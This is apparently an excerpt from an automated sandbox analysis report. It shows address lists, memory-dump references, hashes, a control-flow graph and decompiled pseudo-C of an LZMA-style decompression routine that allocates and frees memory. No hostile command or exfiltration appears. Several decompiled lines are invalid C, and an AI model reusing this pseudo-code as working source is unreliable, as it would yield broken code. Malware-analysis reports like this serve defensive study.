                                                          0x00407349
                                                          0x004071c7
                                                          0x004071c9
                                                          0x004071cb
                                                          0x004071cd
                                                          0x004071d0
                                                          0x004071d1
                                                          0x004071d3
                                                          0x004071d5
                                                          0x004071d8
                                                          0x004071db
                                                          0x004071f1
                                                          0x004071f6
                                                          0x0040722e
                                                          0x0040722e
                                                          0x00407232
                                                          0x0040725e
                                                          0x00407260
                                                          0x00407267
                                                          0x0040726a
                                                          0x0040726d
                                                          0x0040726d
                                                          0x00407272
                                                          0x00407272
                                                          0x00407274
                                                          0x00407277
                                                          0x0040727e
                                                          0x00407281
                                                          0x004072ae
                                                          0x004072ae
                                                          0x004072b1
                                                          0x004072b4
                                                          0x00407328
                                                          0x00407328
                                                          0x00407328
                                                          0x00000000
                                                          0x00407328
                                                          0x004072b6
                                                          0x004072bc
                                                          0x004072bf
                                                          0x004072c2
                                                          0x004072c5
                                                          0x004072c8
                                                          0x004072cb
                                                          0x004072ce
                                                          0x004072d1
                                                          0x004072d4
                                                          0x004072d7
                                                          0x004072f0
                                                          0x004072f2
                                                          0x004072f5
                                                          0x004072f6
                                                          0x004072f9
                                                          0x004072fb
                                                          0x004072fe
                                                          0x00407300
                                                          0x00407302
                                                          0x00407305
                                                          0x00407307
                                                          0x0040730a
                                                          0x0040730e
                                                          0x00407310
                                                          0x00407310
                                                          0x00407311
                                                          0x00407314
                                                          0x00407317
                                                          0x004072d9
                                                          0x004072d9
                                                          0x004072e1
                                                          0x004072e6
                                                          0x004072e8
                                                          0x004072eb
                                                          0x004072eb
                                                          0x0040731a
                                                          0x00407321
                                                          0x004072ab
                                                          0x004072ab
                                                          0x004072ab
                                                          0x004072ab
                                                          0x00000000
                                                          0x00407323
                                                          0x00000000
                                                          0x00407323
                                                          0x00407321
                                                          0x00407234
                                                          0x00407237
                                                          0x00407239
                                                          0x0040723c
                                                          0x0040723f
                                                          0x00407242
                                                          0x00407244
                                                          0x00407247
                                                          0x0040724a
                                                          0x0040724a
                                                          0x0040724d
                                                          0x0040724d
                                                          0x00407250
                                                          0x00407257
                                                          0x0040722b
                                                          0x0040722b
                                                          0x0040722b
                                                          0x0040722b
                                                          0x00000000
                                                          0x00407259
                                                          0x00000000
                                                          0x00407259
                                                          0x00407257
                                                          0x004071dd
                                                          0x004071e0
                                                          0x004071e2
                                                          0x004071e5
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f44
                                                          0x00406f44
                                                          0x00406f48
                                                          0x0040758d
                                                          0x00000000
                                                          0x0040758d
                                                          0x00406f4e
                                                          0x00406f51
                                                          0x00406f54
                                                          0x00406f57
                                                          0x00406f5a
                                                          0x00406f5d
                                                          0x00406f60
                                                          0x00406f62
                                                          0x00406f65
                                                          0x00406f68
                                                          0x00406f6b
                                                          0x00406f6d
                                                          0x00406f6d
                                                          0x00406f6d
                                                          0x00000000
                                                          0x00000000
                                                          0x004070cf
                                                          0x004070cf
                                                          0x004070d3
                                                          0x00407599
                                                          0x00000000
                                                          0x00407599
                                                          0x004070d9
                                                          0x004070dc
                                                          0x004070df
                                                          0x004070e2
                                                          0x004070e4
                                                          0x004070e4
                                                          0x004070e4
                                                          0x004070e7
                                                          0x004070ea
                                                          0x004070ed
                                                          0x004070f0
                                                          0x004070f3
                                                          0x004070f6
                                                          0x004070f7
                                                          0x004070f9
                                                          0x004070f9
                                                          0x004070f9
                                                          0x004070fc
                                                          0x004070ff
                                                          0x00407102
                                                          0x00407105
                                                          0x00407105
                                                          0x00407105
                                                          0x00407108
                                                          0x0040710a
                                                          0x0040710a
                                                          0x00000000
                                                          0x00000000
                                                          0x0040734c
                                                          0x0040734c
                                                          0x0040734c
                                                          0x00407350
                                                          0x00000000
                                                          0x00000000
                                                          0x00407356
                                                          0x00407359
                                                          0x0040735c
                                                          0x0040735f
                                                          0x00407361
                                                          0x00407361
                                                          0x00407361
                                                          0x00407364
                                                          0x00407367
                                                          0x0040736a
                                                          0x0040736d
                                                          0x00407370
                                                          0x00407373
                                                          0x00407374
                                                          0x00407376
                                                          0x00407376
                                                          0x00407376
                                                          0x00407379
                                                          0x0040737c
                                                          0x0040737f
                                                          0x00407382
                                                          0x00407385
                                                          0x00407389
                                                          0x0040738b
                                                          0x0040738e
                                                          0x00000000
                                                          0x00407390
                                                          0x0040710d
                                                          0x0040710d
                                                          0x00000000
                                                          0x0040710d
                                                          0x0040738e
                                                          0x004075c3
                                                          0x004075e5
                                                          0x004075eb
                                                          0x004075ed
                                                          0x004075f4
                                                          0x004075f6
                                                          0x004075fd
                                                          0x00407601
                                                          0x00000000
                                                          0x00406bf2
                                                          0x004075fa
                                                          0x004075fa
                                                          0x00000000
                                                          0x004075fa
                                                          0x00407447
                                                          0x004074cd
                                                          0x004074d3
                                                          0x004074d6
                                                          0x004074d9
                                                          0x004074dc
                                                          0x004074df
                                                          0x004074e2
                                                          0x004074e5
                                                          0x004074e8
                                                          0x004074ee
                                                          0x00407507
                                                          0x0040750a
                                                          0x0040750d
                                                          0x00407510
                                                          0x00407514
                                                          0x00407516
                                                          0x00407517
                                                          0x0040751a
                                                          0x004074f0
                                                          0x004074f0
                                                          0x004074f8
                                                          0x004074fd
                                                          0x004074ff
                                                          0x00407502
                                                          0x00407502
                                                          0x00407524
                                                          0x00000000
                                                          0x00407526
                                                          0x00000000
                                                          0x00407526
                                                          0x00407524
                                                          0x00000000
                                                          0x00407399

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                          • Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
                                                          • Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                          • Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 767 4070ab-4070af 768 4070b5-4070b9 767->768 769 407166-407178 767->769 770 4075fa 768->770 771 4070bf-4070d3 768->771 779 4073cb-4073e0 769->779 772 4075fd-407601 770->772 773 407599-4075a3 771->773 774 4070d9-4070e2 771->774 776 4075e5-4075f8 773->776 777 4070e4 774->777 778 4070e7-407117 774->778 776->772 777->778 783 406be3-406bec 778->783 780 4073e2-4073f8 779->780 781 4073fa-407410 779->781 784 407413-40741a 780->784 781->784 783->770 785 406bf2 783->785 786 407441-40744d 784->786 787 40741c-407420 784->787 788 406bf9-406bfd 785->788 789 406d39-406d5a 785->789 790 406c9e-406ca2 785->790 791 406d0e-406d12 785->791 786->783 792 407426-40743e 787->792 793 4075cf-4075d9 787->793 788->776 795 406c03-406c10 788->795 789->779 798 406ca8-406cc1 790->798 799 40754e-407558 790->799 796 406d18-406d2c 791->796 797 40755d-407567 791->797 792->786 793->776 795->770 800 406c16-406c5c 795->800 801 406d2f-406d37 796->801 797->776 802 406cc4-406cc8 798->802 799->776 803 406c84-406c86 800->803 804 406c5e-406c62 800->804 801->789 801->791 802->790 805 406cca-406cd0 802->805 810 406c94-406c9c 803->810 811 406c88-406c92 803->811 808 406c64-406c67 GlobalFree 804->808 809 406c6d-406c7b GlobalAlloc 804->809 806 406cd2-406cd9 805->806 807 406cfa-406d0c 805->807 812 406ce4-406cf4 GlobalAlloc 806->812 813 406cdb-406cde GlobalFree 806->813 807->801 808->809 809->770 814 406c81 809->814 810->802 811->810 811->811 812->770 812->807 813->812 814->803
                                                          C-Code - Quality: 98%
                                                          			E004070AB() {
                                                          				unsigned short _t532;
                                                          				signed int _t533;
                                                          				void _t534;
                                                          				void* _t535;
                                                          				signed int _t536;
                                                          				signed int _t565;
                                                          				signed int _t568;
                                                          				signed int _t589;
                                                          				signed int* _t606;
                                                          				void* _t613;
                                                          
                                                          				L0:
                                                          				while(1) {
                                                          					L0:
                                                          					if( *(_t613 - 0x40) != 0) {
                                                          						L89:
                                                          						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                                                          						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                                                          						L69:
                                                          						_t606 =  *(_t613 - 0x58);
                                                          						 *(_t613 - 0x84) = 0x12;
                                                          						L132:
                                                          						 *(_t613 - 0x54) = _t606;
                                                          						L133:
                                                          						_t532 =  *_t606;
                                                          						_t589 = _t532 & 0x0000ffff;
                                                          						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                          						if( *(_t613 - 0xc) >= _t565) {
                                                          							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                          							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                          							 *(_t613 - 0x40) = 1;
                                                          							_t533 = _t532 - (_t532 >> 5);
                                                          							 *_t606 = _t533;
                                                          						} else {
                                                          							 *(_t613 - 0x10) = _t565;
                                                          							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                          							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                                                          						}
                                                          						if( *(_t613 - 0x10) >= 0x1000000) {
                                                          							L139:
                                                          							_t534 =  *(_t613 - 0x84);
                                                          							L140:
                                                          							 *(_t613 - 0x88) = _t534;
                                                          							goto L1;
                                                          						} else {
                                                          							L137:
                                                          							if( *(_t613 - 0x6c) == 0) {
                                                          								 *(_t613 - 0x88) = 5;
                                                          								goto L170;
                                                          							}
                                                          							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                          							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                          							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                          							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                          							goto L139;
                                                          						}
                                                          					} else {
                                                          						if( *(__ebp - 0x60) == 0) {
                                                          							L171:
                                                          							_t536 = _t535 | 0xffffffff;
                                                          							L172:
                                                          							return _t536;
                                                          						}
                                                          						__eax = 0;
                                                          						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                          						0 | _t258 = _t258 + _t258 + 9;
                                                          						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                          						L75:
                                                          						if( *(__ebp - 0x64) == 0) {
                                                          							 *(__ebp - 0x88) = 0x1b;
                                                          							L170:
                                                          							_t568 = 0x22;
                                                          							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                          							_t536 = 0;
                                                          							goto L172;
                                                          						}
                                                          						__eax =  *(__ebp - 0x14);
                                                          						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          						if(__eax >=  *(__ebp - 0x74)) {
                                                          							__eax = __eax +  *(__ebp - 0x74);
                                                          						}
                                                          						__edx =  *(__ebp - 8);
                                                          						__cl =  *(__eax + __edx);
                                                          						__eax =  *(__ebp - 0x14);
                                                          						 *(__ebp - 0x5c) = __cl;
                                                          						 *(__eax + __edx) = __cl;
                                                          						__eax = __eax + 1;
                                                          						__edx = 0;
                                                          						_t274 = __eax %  *(__ebp - 0x74);
                                                          						__eax = __eax /  *(__ebp - 0x74);
                                                          						__edx = _t274;
                                                          						__eax =  *(__ebp - 0x68);
                                                          						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                          						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          						_t283 = __ebp - 0x64;
                                                          						 *_t283 =  *(__ebp - 0x64) - 1;
                                                          						 *( *(__ebp - 0x68)) = __cl;
                                                          						L79:
                                                          						 *(__ebp - 0x14) = __edx;
                                                          						L80:
                                                          						 *(__ebp - 0x88) = 2;
                                                          					}
                                                          					L1:
                                                          					_t535 =  *(_t613 - 0x88);
                                                          					if(_t535 > 0x1c) {
                                                          						goto L171;
                                                          					}
                                                          					switch( *((intOrPtr*)(_t535 * 4 +  &M00407602))) {
                                                          						case 0:
                                                          							if( *(_t613 - 0x6c) == 0) {
                                                          								goto L170;
                                                          							}
                                                          							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                          							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                          							_t535 =  *( *(_t613 - 0x70));
                                                          							if(_t535 > 0xe1) {
                                                          								goto L171;
                                                          							}
                                                          							_t539 = _t535 & 0x000000ff;
                                                          							_push(0x2d);
                                                          							asm("cdq");
                                                          							_pop(_t570);
                                                          							_push(9);
                                                          							_pop(_t571);
                                                          							_t609 = _t539 / _t570;
                                                          							_t541 = _t539 % _t570 & 0x000000ff;
                                                          							asm("cdq");
                                                          							_t604 = _t541 % _t571 & 0x000000ff;
                                                          							 *(_t613 - 0x3c) = _t604;
                                                          							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                          							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                                                          							_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                          							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                          								L10:
                                                          								if(_t612 == 0) {
                                                          									L12:
                                                          									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                          									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                          									goto L15;
                                                          								} else {
                                                          									goto L11;
                                                          								}
                                                          								do {
                                                          									L11:
                                                          									_t612 = _t612 - 1;
                                                          									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                          								} while (_t612 != 0);
                                                          								goto L12;
                                                          							}
                                                          							if( *(_t613 - 4) != 0) {
                                                          								GlobalFree( *(_t613 - 4));
                                                          							}
                                                          							_t535 = GlobalAlloc(0x40, 0x600); // executed
                                                          							 *(_t613 - 4) = _t535;
                                                          							if(_t535 == 0) {
                                                          								goto L171;
                                                          							} else {
                                                          								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                          								goto L10;
                                                          							}
                                                          						case 1:
                                                          							L13:
                                                          							__eflags =  *(_t613 - 0x6c);
                                                          							if( *(_t613 - 0x6c) == 0) {
                                                          								 *(_t613 - 0x88) = 1;
                                                          								goto L170;
                                                          							}
                                                          							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                          							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                          							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                          							_t45 = _t613 - 0x48;
                                                          							 *_t45 =  *(_t613 - 0x48) + 1;
                                                          							__eflags =  *_t45;
                                                          							L15:
                                                          							if( *(_t613 - 0x48) < 4) {
                                                          								goto L13;
                                                          							}
                                                          							_t547 =  *(_t613 - 0x40);
                                                          							if(_t547 ==  *(_t613 - 0x74)) {
                                                          								L20:
                                                          								 *(_t613 - 0x48) = 5;
                                                          								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                          								goto L23;
                                                          							}
                                                          							 *(_t613 - 0x74) = _t547;
                                                          							if( *(_t613 - 8) != 0) {
                                                          								GlobalFree( *(_t613 - 8));
                                                          							}
                                                          							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                          							 *(_t613 - 8) = _t535;
                                                          							if(_t535 == 0) {
                                                          								goto L171;
                                                          							} else {
                                                          								goto L20;
                                                          							}
                                                          						case 2:
                                                          							L24:
                                                          							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                          							 *(_t613 - 0x84) = 6;
                                                          							 *(_t613 - 0x4c) = _t554;
                                                          							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                                                          							goto L132;
                                                          						case 3:
                                                          							L21:
                                                          							__eflags =  *(_t613 - 0x6c);
                                                          							if( *(_t613 - 0x6c) == 0) {
                                                          								 *(_t613 - 0x88) = 3;
                                                          								goto L170;
                                                          							}
                                                          							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                          							_t67 = _t613 - 0x70;
                                                          							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                          							__eflags =  *_t67;
                                                          							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                          							L23:
                                                          							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                          							if( *(_t613 - 0x48) != 0) {
                                                          								goto L21;
                                                          							}
                                                          							goto L24;
                                                          						case 4:
                                                          							goto L133;
                                                          						case 5:
                                                          							goto L137;
                                                          						case 6:
                                                          							__edx = 0;
                                                          							__eflags =  *(__ebp - 0x40);
                                                          							if( *(__ebp - 0x40) != 0) {
                                                          								__eax =  *(__ebp - 4);
                                                          								__ecx =  *(__ebp - 0x38);
                                                          								 *(__ebp - 0x34) = 1;
                                                          								 *(__ebp - 0x84) = 7;
                                                          								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                          								goto L132;
                                                          							}
                                                          							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                          							__esi =  *(__ebp - 0x60);
                                                          							__cl = 8;
                                                          							__cl = 8 -  *(__ebp - 0x3c);
                                                          							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                          							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                          							__ecx =  *(__ebp - 0x3c);
                                                          							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                          							__ecx =  *(__ebp - 4);
                                                          							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                          							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                          							__eflags =  *(__ebp - 0x38) - 4;
                                                          							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                          							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                          							if( *(__ebp - 0x38) >= 4) {
                                                          								__eflags =  *(__ebp - 0x38) - 0xa;
                                                          								if( *(__ebp - 0x38) >= 0xa) {
                                                          									_t98 = __ebp - 0x38;
                                                          									 *_t98 =  *(__ebp - 0x38) - 6;
                                                          									__eflags =  *_t98;
                                                          								} else {
                                                          									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                          								}
                                                          							} else {
                                                          								 *(__ebp - 0x38) = 0;
                                                          							}
                                                          							__eflags =  *(__ebp - 0x34) - __edx;
                                                          							if( *(__ebp - 0x34) == __edx) {
                                                          								__ebx = 0;
                                                          								__ebx = 1;
                                                          								goto L61;
                                                          							} else {
                                                          								__eax =  *(__ebp - 0x14);
                                                          								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          								__eflags = __eax -  *(__ebp - 0x74);
                                                          								if(__eax >=  *(__ebp - 0x74)) {
                                                          									__eax = __eax +  *(__ebp - 0x74);
                                                          									__eflags = __eax;
                                                          								}
                                                          								__ecx =  *(__ebp - 8);
                                                          								__ebx = 0;
                                                          								__ebx = 1;
                                                          								__al =  *((intOrPtr*)(__eax + __ecx));
                                                          								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                          								goto L41;
                                                          							}
                                                          						case 7:
                                                          							__eflags =  *(__ebp - 0x40) - 1;
                                                          							if( *(__ebp - 0x40) != 1) {
                                                          								__eax =  *(__ebp - 0x24);
                                                          								 *(__ebp - 0x80) = 0x16;
                                                          								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                          								__eax =  *(__ebp - 0x28);
                                                          								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                          								__eax =  *(__ebp - 0x2c);
                                                          								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                          								__eax = 0;
                                                          								__eflags =  *(__ebp - 0x38) - 7;
                                                          								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                          								__al = __al & 0x000000fd;
                                                          								__eax = (__eflags >= 0) - 1 + 0xa;
                                                          								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                          								__eax =  *(__ebp - 4);
                                                          								__eax =  *(__ebp - 4) + 0x664;
                                                          								__eflags = __eax;
                                                          								 *(__ebp - 0x58) = __eax;
                                                          								goto L69;
                                                          							}
                                                          							__eax =  *(__ebp - 4);
                                                          							__ecx =  *(__ebp - 0x38);
                                                          							 *(__ebp - 0x84) = 8;
                                                          							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                          							goto L132;
                                                          						case 8:
                                                          							__eflags =  *(__ebp - 0x40);
                                                          							if( *(__ebp - 0x40) != 0) {
                                                          								__eax =  *(__ebp - 4);
                                                          								__ecx =  *(__ebp - 0x38);
                                                          								 *(__ebp - 0x84) = 0xa;
                                                          								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                          							} else {
                                                          								__eax =  *(__ebp - 0x38);
                                                          								__ecx =  *(__ebp - 4);
                                                          								__eax =  *(__ebp - 0x38) + 0xf;
                                                          								 *(__ebp - 0x84) = 9;
                                                          								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                          								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                          							}
                                                          							goto L132;
                                                          						case 9:
                                                          							goto L0;
                                                          						case 0xa:
                                                          							__eflags =  *(__ebp - 0x40);
                                                          							if( *(__ebp - 0x40) != 0) {
                                                          								__eax =  *(__ebp - 4);
                                                          								__ecx =  *(__ebp - 0x38);
                                                          								 *(__ebp - 0x84) = 0xb;
                                                          								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                          								goto L132;
                                                          							}
                                                          							__eax =  *(__ebp - 0x28);
                                                          							goto L88;
                                                          						case 0xb:
                                                          							__eflags =  *(__ebp - 0x40);
                                                          							if( *(__ebp - 0x40) != 0) {
                                                          								__ecx =  *(__ebp - 0x24);
                                                          								__eax =  *(__ebp - 0x20);
                                                          								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                          							} else {
                                                          								__eax =  *(__ebp - 0x24);
                                                          							}
                                                          							__ecx =  *(__ebp - 0x28);
                                                          							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                          							L88:
                                                          							__ecx =  *(__ebp - 0x2c);
                                                          							 *(__ebp - 0x2c) = __eax;
                                                          							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                          							goto L89;
                                                          						case 0xc:
                                                          							L99:
                                                          							__eflags =  *(__ebp - 0x6c);
                                                          							if( *(__ebp - 0x6c) == 0) {
                                                          								 *(__ebp - 0x88) = 0xc;
                                                          								goto L170;
                                                          							}
                                                          							__ecx =  *(__ebp - 0x70);
                                                          							__eax =  *(__ebp - 0xc);
                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							_t334 = __ebp - 0x70;
                                                          							 *_t334 =  *(__ebp - 0x70) + 1;
                                                          							__eflags =  *_t334;
                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							__eax =  *(__ebp - 0x2c);
                                                          							goto L101;
                                                          						case 0xd:
                                                          							L37:
                                                          							__eflags =  *(__ebp - 0x6c);
                                                          							if( *(__ebp - 0x6c) == 0) {
                                                          								 *(__ebp - 0x88) = 0xd;
                                                          								goto L170;
                                                          							}
                                                          							__ecx =  *(__ebp - 0x70);
                                                          							__eax =  *(__ebp - 0xc);
                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							_t122 = __ebp - 0x70;
                                                          							 *_t122 =  *(__ebp - 0x70) + 1;
                                                          							__eflags =  *_t122;
                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							L39:
                                                          							__eax =  *(__ebp - 0x40);
                                                          							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                          							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                          								goto L48;
                                                          							}
                                                          							__eflags = __ebx - 0x100;
                                                          							if(__ebx >= 0x100) {
                                                          								goto L54;
                                                          							}
                                                          							L41:
                                                          							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                          							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                          							__ecx =  *(__ebp - 0x58);
                                                          							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                          							 *(__ebp - 0x48) = __eax;
                                                          							__eax = __eax + 1;
                                                          							__eax = __eax << 8;
                                                          							__eax = __eax + __ebx;
                                                          							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          							__ax =  *__esi;
                                                          							 *(__ebp - 0x54) = __esi;
                                                          							__edx = __ax & 0x0000ffff;
                                                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                          							__eflags =  *(__ebp - 0xc) - __ecx;
                                                          							if( *(__ebp - 0xc) >= __ecx) {
                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          								__cx = __ax;
                                                          								 *(__ebp - 0x40) = 1;
                                                          								__cx = __ax >> 5;
                                                          								__eflags = __eax;
                                                          								__ebx = __ebx + __ebx + 1;
                                                          								 *__esi = __ax;
                                                          							} else {
                                                          								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                          								 *(__ebp - 0x10) = __ecx;
                                                          								0x800 = 0x800 - __edx;
                                                          								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                          								__ebx = __ebx + __ebx;
                                                          								 *__esi = __cx;
                                                          							}
                                                          							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          							 *(__ebp - 0x44) = __ebx;
                                                          							if( *(__ebp - 0x10) >= 0x1000000) {
                                                          								goto L39;
                                                          							} else {
                                                          								goto L37;
                                                          							}
                                                          						case 0xe:
                                                          							L46:
                                                          							__eflags =  *(__ebp - 0x6c);
                                                          							if( *(__ebp - 0x6c) == 0) {
                                                          								 *(__ebp - 0x88) = 0xe;
                                                          								goto L170;
                                                          							}
                                                          							__ecx =  *(__ebp - 0x70);
                                                          							__eax =  *(__ebp - 0xc);
                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
